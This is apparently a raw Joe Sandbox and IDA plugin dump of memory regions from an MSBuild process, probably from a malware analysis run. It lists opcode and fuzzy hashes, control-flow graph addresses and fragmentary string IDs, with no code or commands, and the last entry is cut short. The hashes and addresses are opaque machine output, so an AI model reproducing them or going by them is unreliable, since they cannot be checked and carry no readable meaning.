                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 457753915ff510f9709ae696d91a0df582cc461db040adf804cc0886d9b6c5dc
                                                          • Instruction ID: 587b73b1a7ac0bcac39af2334347938c7fc828dccfb38454f432b2a92d011e69
                                                          • Opcode Fuzzy Hash: 457753915ff510f9709ae696d91a0df582cc461db040adf804cc0886d9b6c5dc
                                                          • Instruction Fuzzy Hash: 55519774E00308DFEB18DFAAD594A9DBBF2BF89300F249169E815AB364DB305942CF14
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f2c0a5a4b40d81a3ceb96e1056a3a52e56d088f3222f06d80ec80eef4951ab5
                                                          • Instruction ID: cca6c5bfd0bbf4a577e784297257099ee17fa320a8160c629426d6941d222af5
                                                          • Opcode Fuzzy Hash: 2f2c0a5a4b40d81a3ceb96e1056a3a52e56d088f3222f06d80ec80eef4951ab5
                                                          • Instruction Fuzzy Hash: 5A518674E04208DFDB19DFAAD494A9DBBF2BF89300F24916AE815AB365DB305846CF14

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 10376f1-1037725 1 1037b54-1037b58 0->1 2 103772b-103774e 0->2 3 1037b71-1037b7f 1->3 4 1037b5a-1037b6e 1->4 11 1037754-1037761 2->11 12 10377fc-1037800 2->12 9 1037b81-1037b96 3->9 10 1037bf0-1037c05 3->10 17 1037b98-1037b9b 9->17 18 1037b9d-1037baa 9->18 19 1037c07-1037c0a 10->19 20 1037c0c-1037c19 10->20 28 1037763-103776e 11->28 29 1037770 11->29 15 1037802-1037810 12->15 16 1037848-1037851 12->16 15->16 36 1037812-103782d 15->36 21 1037c67 16->21 22 1037857-1037861 16->22 24 1037bac-1037bed 17->24 18->24 25 1037c1b-1037c56 19->25 20->25 30 1037c6c-1037c85 21->30 22->1 26 1037867-1037870 22->26 73 1037c5d-1037c64 25->73 34 1037872-1037877 26->34 35 103787f-103788b 26->35 31 1037772-1037774 28->31 29->31 31->12 38 103777a-10377dc 31->38 34->35 35->30 41 1037891-1037897 35->41 57 103783b 36->57 58 103782f-1037839 36->58 82 10377e2-10377f9 38->82 83 10377de 38->83 43 1037b3e-1037b42 41->43 44 103789d-10378ad 41->44 43->21 47 1037b48-1037b4e 43->47 55 10378c1-10378c3 44->55 56 10378af-10378bf 44->56 47->1 47->26 59 10378c6-10378cc 55->59 56->59 60 103783d-103783f 57->60 58->60 59->43 63 10378d2-10378e1 59->63 60->16 64 1037841 60->64 68 10378e7 63->68 69 103798f-10379ba call 1037538 * 2 63->69 64->16 71 10378ea-10378fb 68->71 86 10379c0-10379c4 69->86 87 1037aa4-1037abe 69->87 71->30 75 1037901-1037913 71->75 75->30 77 1037919-1037931 75->77 140 1037933 call 1037f31 77->140 141 1037933 call 1038055 77->141 142 1037933 call 1037f35 77->142 143 1037933 call 1037fa4 77->143 144 1037933 call 1037fe4 77->144 145 1037933 call 1037f39 77->145 146 1037933 call 10380d8 77->146 147 1037933 call 1037f3d 77->147 81 1037939-1037949 81->43 85 103794f-1037952 81->85 82->12 83->82 88 1037954-103795a 85->88 89 103795c-103795f 85->89 86->43 91 10379ca-10379ce 86->91 87->1 109 1037ac4-1037ac8 87->109 88->89 92 1037965-1037968 88->92 89->21 89->92 94 10379d0-10379dd 91->94 95 10379f6-10379fc 91->95 96 1037970-1037973 92->96 97 103796a-103796e 92->97 112 10379df-10379ea 94->112 113 10379ec 94->113 99 1037a37-1037a3d 95->99 100 10379fe-1037a02 95->100 96->21 98 1037979-103797d 96->98 97->96 97->98 98->21 101 1037983-1037989 98->101 103 1037a49-1037a4f 99->103 104 1037a3f-1037a43 99->104 100->99 102 1037a04-1037a0d 100->102 101->69 101->71 107 1037a0f-1037a14 102->107 108 1037a1c-1037a32 102->108 110 1037a51-1037a55 103->110 111 1037a5b-1037a5d 103->111 104->73 104->103 107->108 108->43 117 1037b04-1037b08 109->117 118 1037aca-1037ad4 call 10363e0 109->118 110->43 110->111 114 1037a92-1037a94 111->114 115 1037a5f-1037a68 111->115 116 10379ee-10379f0 112->116 113->116 114->43 122 1037a9a-1037aa1 114->122 120 1037a77-1037a8d 115->120 121 1037a6a-1037a6f 115->121 116->43 116->95 117->73 124 1037b0e-1037b12 117->124 118->117 128 1037ad6-1037aeb 118->128 120->43 121->120 124->73 127 1037b18-1037b25 124->127 131 1037b27-1037b32 127->131 132 1037b34 127->132 128->117 137 1037aed-1037b02 128->137 134 1037b36-1037b38 131->134 132->134 134->43 134->73 137->1 137->117 140->81 141->81 142->81 143->81 144->81 145->81 146->81 147->81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                          • API String ID: 0-2212926057
                                                          • Opcode ID: f62651f094fb91a6e6087424d19491d2e4bd48bd291d5257ae625ef9a8f0913a
                                                          • Instruction ID: ac9b86f5c6efd380a1679900d8414988c354315f4caa34325b2256a964fb7db9
                                                          • Opcode Fuzzy Hash: f62651f094fb91a6e6087424d19491d2e4bd48bd291d5257ae625ef9a8f0913a
                                                          • Instruction Fuzzy Hash: 80129B74A00209DFDB29CF69C884AAEBBF6FF89314F148599E985DB261D730ED41CB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1248 1036498-10364a5 1249 10364a7-10364ab 1248->1249 1250 10364ad-10364af 1248->1250 1249->1250 1251 10364b4-10364bf 1249->1251 1252 10366c0-10366c7 1250->1252 1253 10364c5-10364cc 1251->1253 1254 10366c8 1251->1254 1255 10364d2-10364e1 1253->1255 1256 1036661-1036667 1253->1256 1259 10366cd-1036705 1254->1259 1255->1259 1260 10364e7-10364f6 1255->1260 1257 1036669-103666b 1256->1257 1258 103666d-1036671 1256->1258 1257->1252 1261 1036673-1036679 1258->1261 1262 10366be 1258->1262 1278 1036707-103670c 1259->1278 1279 103670e-1036712 1259->1279 1266 103650b-103650e 1260->1266 1267 10364f8-10364fb 1260->1267 1261->1254 1264 103667b-103667e 1261->1264 1262->1252 1264->1254 1268 1036680-1036695 1264->1268 1269 103651a-1036520 1266->1269 1271 1036510-1036513 1266->1271 1267->1269 1270 10364fd-1036500 1267->1270 1285 1036697-103669d 1268->1285 1286 10366b9-10366bc 1268->1286 1280 1036522-1036528 1269->1280 1281 1036538-1036555 1269->1281 1273 1036601-1036607 1270->1273 1274 1036506 1270->1274 1275 1036566-103656c 1271->1275 1276 1036515 1271->1276 1290 1036609-103660f 1273->1290 1291 103661f-1036629 1273->1291 1282 103662c-1036639 1274->1282 1283 1036584-1036596 1275->1283 1284 103656e-1036574 1275->1284 1276->1282 1287 1036718-103671a 1278->1287 1279->1287 1288 103652a 1280->1288 1289 103652c-1036536 1280->1289 1318 103655e-1036561 1281->1318 1309 103663b-103663f 1282->1309 1310 103664d-103664f 1282->1310 1312 10365a6-10365c9 1283->1312 1313 1036598-10365a4 1283->1313 1292 1036576 1284->1292 1293 1036578-1036582 1284->1293 1294 10366af-10366b2 1285->1294 1295 103669f-10366ad 1285->1295 1286->1252 1296 103672f-1036736 1287->1296 1297 103671c-103672e 1287->1297 1288->1281 1289->1281 1298 1036613-103661d 1290->1298 1299 1036611 1290->1299 1291->1282 1292->1283 1293->1283 1294->1254 1304 10366b4-10366b7 1294->1304 1295->1254 1295->1294 1298->1291 1299->1291 1304->1285 1304->1286 1309->1310 1315 1036641-1036645 1309->1315 1316 1036653-1036656 1310->1316 1312->1254 1324 10365cf-10365d2 1312->1324 1322 10365f1-10365ff 1313->1322 1315->1254 1319 103664b 1315->1319 1316->1254 1320 1036658-103665b 1316->1320 1318->1282 1319->1316 1320->1255 1320->1256 1322->1282 1324->1254 1326 10365d8-10365ea 1324->1326 1326->1322
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $,q$,q
                                                          • API String ID: 0-1498352076
                                                          • Opcode ID: 0938c1f30af48388c2fc29f4f369e8a119289a37d2eb1f3a2065a51886367d71
                                                          • Instruction ID: 2ea54a61b23c2c83ea817844fffe7b5c600caa9eec6782a1680eeca9e2d21d8c
                                                          • Opcode Fuzzy Hash: 0938c1f30af48388c2fc29f4f369e8a119289a37d2eb1f3a2065a51886367d71
                                                          • Instruction Fuzzy Hash: DD81A030B00505EFDB54CF6DC484AADBBFABFC9240B1485A9D585DB3A5DB32E941CB60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2009 1035f38-1035f5a 2010 1035f70-1035f7b 2009->2010 2011 1035f5c-1035f60 2009->2011 2014 1036023-103604f 2010->2014 2015 1035f81-1035f83 2010->2015 2012 1035f62-1035f6e 2011->2012 2013 1035f88-1035f8f 2011->2013 2012->2010 2012->2013 2017 1035f91-1035f98 2013->2017 2018 1035faf-1035fb8 2013->2018 2022 1036056-10360ae 2014->2022 2016 103601b-1036020 2015->2016 2017->2018 2020 1035f9a-1035fa5 2017->2020 2110 1035fba call 1035f29 2018->2110 2111 1035fba call 1035f38 2018->2111 2020->2022 2023 1035fab-1035fad 2020->2023 2021 1035fc0-1035fc2 2024 1035fc4-1035fc8 2021->2024 2025 1035fca-1035fd2 2021->2025 2041 10360b0-10360b6 2022->2041 2042 10360bd-10360cf 2022->2042 2023->2016 2024->2025 2027 1035fe5-1036004 call 10369a0 2024->2027 2028 1035fe1-1035fe3 2025->2028 2029 1035fd4-1035fd9 2025->2029 2035 1036006-103600f 2027->2035 2036 1036019 2027->2036 2028->2016 2029->2028 2115 1036011 call 103aef0 2035->2115 2116 1036011 call 103afad 2035->2116 2036->2016 2038 1036017 2038->2016 2041->2042 2044 1036163-1036165 2042->2044 2045 10360d5-10360d9 2042->2045 2113 1036167 call 1036300 2044->2113 2114 1036167 call 10362f0 2044->2114 2046 10360db-10360e7 2045->2046 2047 10360e9-10360f6 2045->2047 2055 10360f8-1036102 2046->2055 2047->2055 2048 103616d-1036173 2049 1036175-103617b 2048->2049 2050 103617f-1036186 2048->2050 2053 10361e1-1036240 2049->2053 2054 103617d 2049->2054 2070 1036247-103626b 2053->2070 2054->2050 2058 1036104-1036113 2055->2058 2059 103612f-1036133 2055->2059 2068 1036123-103612d 2058->2068 2069 1036115-103611c 2058->2069 2060 1036135-103613b 2059->2060 2061 103613f-1036143 2059->2061 2064 1036189-10361da 2060->2064 2065 103613d 2060->2065 2061->2050 2066 1036145-1036149 2061->2066 2064->2053 2065->2050 2066->2070 2071 103614f-1036161 2066->2071 2068->2059 2069->2068 2078 1036271-1036273 2070->2078 2079 103626d-103626f 2070->2079 2071->2050 2081 1036275-1036279 2078->2081 2082 1036284-1036286 2078->2082 2080 10362e9-10362ec 2079->2080 2086 103627b-103627d 2081->2086 2087 103627f-1036282 2081->2087 2088 1036299-103629f 2082->2088 2089 1036288-103628c 2082->2089 2086->2080 2087->2080 2093 10362a1-10362c8 2088->2093 2094 10362ca-10362cc 2088->2094 2090 1036292-1036297 2089->2090 2091 103628e-1036290 2089->2091 2090->2080 2091->2080 2096 10362d3-10362d5 2093->2096 2094->2096 2100 10362d7-10362d9 2096->2100 2101 10362db-10362dd 2096->2101 2100->2080 2102 10362e6 2101->2102 2103 10362df-10362e4 2101->2103 2102->2080 2103->2080 2110->2021 2111->2021 2113->2048 2114->2048 2115->2038 2116->2038
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hq$Hq
                                                          • API String ID: 0-925789375
                                                          • Opcode ID: 12715a67f1bd456ca3836c052ed12eb2e1d0ccb7cf841f0d3736727ebcbe2aac
                                                          • Instruction ID: 41c9b381cefa7bc73c777dbdbf7fe6ba28a3372e70c759d9b1d0f654311ef75d
                                                          • Opcode Fuzzy Hash: 12715a67f1bd456ca3836c052ed12eb2e1d0ccb7cf841f0d3736727ebcbe2aac
                                                          • Instruction Fuzzy Hash: 5EB1CE307042049FDB159F69D894B7E7BFAAFC9300F184969E4868B3A6CB36C942C791

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2526 103ca0c-103ca14 2527 103ca16 2526->2527 2528 103ca6d-103cb1c call 10341a0 call 1033cc0 2526->2528 2527->2528 2538 103cb23-103cb44 call 1035658 2528->2538 2539 103cb1e 2528->2539 2541 103cb49-103cb54 2538->2541 2539->2538 2542 103cb56 2541->2542 2543 103cb5b-103cb5f 2541->2543 2542->2543 2544 103cb61-103cb62 2543->2544 2545 103cb64-103cb6b 2543->2545 2546 103cb83-103cbc7 2544->2546 2547 103cb72-103cb80 2545->2547 2548 103cb6d 2545->2548 2552 103cc2d-103cc44 2546->2552 2547->2546 2548->2547 2554 103cc46-103cc6b 2552->2554 2555 103cbc9-103cbdf 2552->2555 2562 103cc83 2554->2562 2563 103cc6d-103cc82 2554->2563 2559 103cbe1-103cbed 2555->2559 2560 103cc09 2555->2560 2564 103cbf7-103cbfd 2559->2564 2565 103cbef-103cbf5 2559->2565 2561 103cc0f-103cc2c 2560->2561 2561->2552 2567 103cc84 2562->2567 2563->2562 2566 103cc07 2564->2566 2565->2566 2566->2561 2567->2567
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: 96f54809b29c065c763aba9b5df4298c54e36cadacd816a56cad493b429a39dd
                                                          • Instruction ID: fab98cc91ffa327462e4d6c7f700fa7b6592e1d463cb49b04e174d8f7893af1f
                                                          • Opcode Fuzzy Hash: 96f54809b29c065c763aba9b5df4298c54e36cadacd816a56cad493b429a39dd
                                                          • Instruction Fuzzy Hash: C771D274E00258CFEB54DFA9D984A9DBBF1BF89300F24809AE459EB361DB309941CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $q$$q
                                                          • API String ID: 0-3126353813
                                                          • Opcode ID: c4a7d6a0cb79d88cce33df4b1fda27dc29b0494cf8c2e7a620fe444b8578819c
                                                          • Instruction ID: 0ce08bf39bdf7003715c72d46114ebec2242587a82e06290e7055cd8f5abc058
                                                          • Opcode Fuzzy Hash: c4a7d6a0cb79d88cce33df4b1fda27dc29b0494cf8c2e7a620fe444b8578819c
                                                          • Instruction Fuzzy Hash: EE3108307042458FEB254B39A89467EB7AFABC4710B1586EBF286CB293DE29CC418751
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq
                                                          • API String ID: 0-1556399337
                                                          • Opcode ID: 182855284126c9438e7d04b9c7c255bd7fa623024ecaec55c6897dcfd5f468d6
                                                          • Instruction ID: 0b06ee95003f3584c6bae84809265929db13dd6378920d052a09e50535853639
                                                          • Opcode Fuzzy Hash: 182855284126c9438e7d04b9c7c255bd7fa623024ecaec55c6897dcfd5f468d6
                                                          • Instruction Fuzzy Hash: 3911A331B0032957EB79619E58D937FA1DEFBC1251F284039D99A8F255DEA1CC0282A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q
                                                          • API String ID: 0-1467158625
                                                          • Opcode ID: 6d354462eb145554124a99c588f6afd5e32fb28bb2f63a625a5c594ca92b8683
                                                          • Instruction ID: bdf5cc5ddbc6ed542449eda748bbb4f48120ac5cf3322ae444b4559327f2fd73
                                                          • Opcode Fuzzy Hash: 6d354462eb145554124a99c588f6afd5e32fb28bb2f63a625a5c594ca92b8683
                                                          • Instruction Fuzzy Hash: ECF049353016156FDB186AA6B8546BBBADFEBCC390B148465BA49C7350DE71CC1193A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRq
                                                          • API String ID: 0-3187445251
                                                          • Opcode ID: eef73cdce836a654ec7a39fad9bd9a8b2e5aa1d59d28f63327ee0865ed926feb
                                                          • Instruction ID: bf6f68f04d0c37fade1552108ddffc9a02b85a64a9be4c1c4ed78381f9207594
                                                          • Opcode Fuzzy Hash: eef73cdce836a654ec7a39fad9bd9a8b2e5aa1d59d28f63327ee0865ed926feb
                                                          • Instruction Fuzzy Hash: 4B5216B8D44219CFCB54EF64E985B9DB7B2FB48705F1085A9D409AB368DB302E81CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRq
                                                          • API String ID: 0-3187445251
                                                          • Opcode ID: 1d0707ba278e21a2e80a3229d11e58e0a5ae4b3f2c7cadab796673cba2cc6323
                                                          • Instruction ID: a2e5eff71ac291dfa32410f363d5de23a8a032f2df74bed3ff057547de2533f9
                                                          • Opcode Fuzzy Hash: 1d0707ba278e21a2e80a3229d11e58e0a5ae4b3f2c7cadab796673cba2cc6323
                                                          • Instruction Fuzzy Hash: 975217B8D44219CFCB54EF64E985B9DB7B2FB48705F1085A9D409AB368DB302E81CF91
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 054C9CD6
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 365269f37c73342106da89b39e46863083c14eeafe6ec989a90fa57ea945a154
                                                          • Instruction ID: bb3476e636d8a0dc5a3072a968fb8f36c9ef0752d4c313cead7e21b09eff68d0
                                                          • Opcode Fuzzy Hash: 365269f37c73342106da89b39e46863083c14eeafe6ec989a90fa57ea945a154
                                                          • Instruction Fuzzy Hash: B6114278E04219AFDB44DFA8D584EFDBBF5FBC8304F14819AE854A7246D730A941CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oq
                                                          • API String ID: 0-1999159160
                                                          • Opcode ID: 9209f8873521089d8139524591afcf96cd2d1fadea5fd8bb985c78a4629f4056
                                                          • Instruction ID: be63413f5718080918096604ec137bb41599fb09125eef08358f85094418c210
                                                          • Opcode Fuzzy Hash: 9209f8873521089d8139524591afcf96cd2d1fadea5fd8bb985c78a4629f4056
                                                          • Instruction Fuzzy Hash: 4C410771B042088FDB199F64E894AAEBBF7EFCC710F14446AE556DB395DE358C0287A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: 5a34b6671af9f6861dffbcfbe492e28ce36a148c41c963ce88fcc6db61c352f1
                                                          • Instruction ID: bfdcaaeb9132f9560115157aecf69d94de20a2f195512d86236203ce0f1c5830
                                                          • Opcode Fuzzy Hash: 5a34b6671af9f6861dffbcfbe492e28ce36a148c41c963ce88fcc6db61c352f1
                                                          • Instruction Fuzzy Hash: C631613170424DAFCF029F64E899AAF3BB6FF88304F004465F95597299CB35C961DB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: d7874ac78e2c8607956d91f82c7d6f3b6b3a82d3d1e6cdf82b5ef7febdec2622
                                                          • Instruction ID: 15876a35f8f2dbf1bebaf2e9c11c8d74a6d1ba737b2ee7ef8cb29d7583dd4fd3
                                                          • Opcode Fuzzy Hash: d7874ac78e2c8607956d91f82c7d6f3b6b3a82d3d1e6cdf82b5ef7febdec2622
                                                          • Instruction Fuzzy Hash: 7421E2703042504FDB26163A949467E6A9AAFC4648704C2FFF592C7A9AEE258C02D341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: e003e1464fad31750b5fe890cb030a907689010222314af535599af2142cd7d1
                                                          • Instruction ID: d60a8e0e7bd114583de447deb28fd7279495f32ab4587eb7238ddb503b12176a
                                                          • Opcode Fuzzy Hash: e003e1464fad31750b5fe890cb030a907689010222314af535599af2142cd7d1
                                                          • Instruction Fuzzy Hash: FC21D0303042104BEB15162A949473E66CBAFC4748F14C1BEF596CBB9AEE65CC429381
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: 8472fe66dbace0e95c38d88eb163c6ebc715cf859f0bf35f4e00f10618461dcd
                                                          • Instruction ID: dfc12b82734ed71de1e754dbf85e4a38290d7e8ef5997d5d86cecc158c2e5408
                                                          • Opcode Fuzzy Hash: 8472fe66dbace0e95c38d88eb163c6ebc715cf859f0bf35f4e00f10618461dcd
                                                          • Instruction Fuzzy Hash: 9321F335704614AFD7159A2AC494A3EBBE6FFC97547148478E946CB398CF32DC02CB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: 98560e34f03bef88da779fb42b7b2b5a7b2850ec78c119cce50d1114d7c4aa38
                                                          • Instruction ID: 1bc11bef07780541947fa1620372b332d23c5fb5d1c90b5b3535ab2370949004
                                                          • Opcode Fuzzy Hash: 98560e34f03bef88da779fb42b7b2b5a7b2850ec78c119cce50d1114d7c4aa38
                                                          • Instruction Fuzzy Hash: 8A219F717092489FDB02AF68E8996AE3BF5EB89314F004469F8458B25ADB348A51DB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: b97f66cb4a9bdb70bcf9dc371bb80329d7795559654f8ba96b9ccacfc2a5c4f9
                                                          • Instruction ID: f655f3b98223d9f395dbfd4e4a4f53ef02332f5af308400469384ab9d94b45af
                                                          • Opcode Fuzzy Hash: b97f66cb4a9bdb70bcf9dc371bb80329d7795559654f8ba96b9ccacfc2a5c4f9
                                                          • Instruction Fuzzy Hash: 56217A74E05248EFDB05CFA5D590AEEBFBAAF88308F1480A9E445A6294DB30D941CB20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3162483948
                                                          • Opcode ID: 5593b1f5626068ee980f0e81356d5a37807acae5263ff26edfb0f144bc6ebd01
                                                          • Instruction ID: 5ed628016ed343941d3d09fc316f2b39412f5ab193c8753a1e6b115aedde43b0
                                                          • Opcode Fuzzy Hash: 5593b1f5626068ee980f0e81356d5a37807acae5263ff26edfb0f144bc6ebd01
                                                          • Instruction Fuzzy Hash: A61106357096159FD7158A2EC4A853E7BE6FFC975131884B9E546CB3A4CF31CC028B90
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae518e2636a8cff2fee3e74e397308834579510ec1596a98fa574ff087779cd3
                                                          • Instruction ID: 485d6d9d881b1181f77911a8cfcdedc9412c2c9f1e6e8a41010f9bfd9ea7c56e
                                                          • Opcode Fuzzy Hash: ae518e2636a8cff2fee3e74e397308834579510ec1596a98fa574ff087779cd3
                                                          • Instruction Fuzzy Hash: EB12BB35CA920A8FD6546F31E6EC13EBA65FF0F323704AC14F1AFC18499F7015A98A65
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a19725b191756cbb185ba8e8d0ccbd64e26e3af6ca962040efccd422a3bb7326
                                                          • Instruction ID: aaa0fafd3bcee206a3620da88c0ebfc136fa30058f72c0959c8eb5477982c915
                                                          • Opcode Fuzzy Hash: a19725b191756cbb185ba8e8d0ccbd64e26e3af6ca962040efccd422a3bb7326
                                                          • Instruction Fuzzy Hash: 3312BB35CA920A8FD6546F31F6EC13EBA65FF0F323704AC14F1AEC18499F7015A98A65
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85f8ddf7515c27a85608c3fbf177200a5f0bb2aa830b2c97104f6d6edf653c0b
                                                          • Instruction ID: d6050832acf7ea9a25a146aae756c190460634090a9e30062a1d626d74999613
                                                          • Opcode Fuzzy Hash: 85f8ddf7515c27a85608c3fbf177200a5f0bb2aa830b2c97104f6d6edf653c0b
